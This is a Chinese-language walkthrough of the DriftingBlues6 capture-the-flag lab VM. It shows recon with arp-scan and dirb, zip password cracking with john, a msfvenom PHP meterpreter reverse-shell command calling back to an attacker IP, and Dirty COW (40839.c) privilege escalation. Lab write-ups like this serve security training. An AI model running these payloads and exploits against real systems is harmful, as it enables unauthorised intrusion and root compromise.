driftingblues6:
Download:driftingblues6
Found
在VMware上查看靶机的mac地址
arp-scan 172.16.10.0/24
根据arp-scan的扫描结果,判断靶机ip为172.16.10.149
Collect
找到主机IP后就可以对其进行信息收集。
使用nmap进行端口扫描
发现有80端口的开放,先使用dirb进行对网站的目录文件扫描
进行对可疑文件和目录的访问查看
在robots.txt文件中查看到/textpattern/textpattern和一句提示,大致是说别忘了还有zip文件
这里登录需要使用用户名和密码,先要进行信息收集
使用dirb工具对zip文件的扫描
dirb http://172.16.10.149 -X .zip
发现是没有扫到文件的,可能是扫描的字典文件太小,再回去看robots.txt文件中的提示,说是要添加到dir-brute
使用kali自带的工具dirbuster再次进行扫描,并且字典文件选一个中等的文件进行尝试
查看扫描结果有spammer.zip文件
访问后进行下载
进行解压查看,发现需要输入密码
得到网站后台用户密码
使用zip2john将zip文件的密码信息进行提取
再使用john进行解密
得到密码为myspace4
使用unzip进行解压后得到creds.txt文件
得到一组用户名和密码,回到登录页面进行登录
上传反弹shell
登录后查看到可以进行上传文件
先在kali中使用msfvemon工具进行生成反弹木马
msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.185 lport=1122 -f raw -o 1.php
将生成的文件进行上传
上传成功
在kali中打开监听模块进行监听,并修改好payload和监听ip、端口
根据页面上的提示,可以猜测到访问的路径应该为
尝试进行访问
查看到刚才上传的1.php文件
先到kali中开始监听,然后对文件进行访问
得到一个shell
Upgrade permissions
进入后查看当前权限
python -c 'import pty;pty.spawn("/bin/bash")'
打开交互式
查看当前系统版本号
可以使用脏牛漏洞进行提权
*漏洞范围*:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)
使用searchsploit进行对脚本(40839.c)的查找
searchsploit -m 40839.c #将文件下载到当前目录
在攻击机中开启http服务,靶机中进行下载
靶机先切换到tmp这个目录,是一个存放临时文件的目录,一般会有权限进行下载
使用gcc进行编译
gcc -pthread 40839.c -o dirty -lcrypt
执行时直接在后面跟上用户的密码
su firefart #切换用户
提权成功,得到flag
END
涉及到的就是zip文件密码的破解,web的文件上传,还有脏牛提权,整体来说还行,继续加油。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论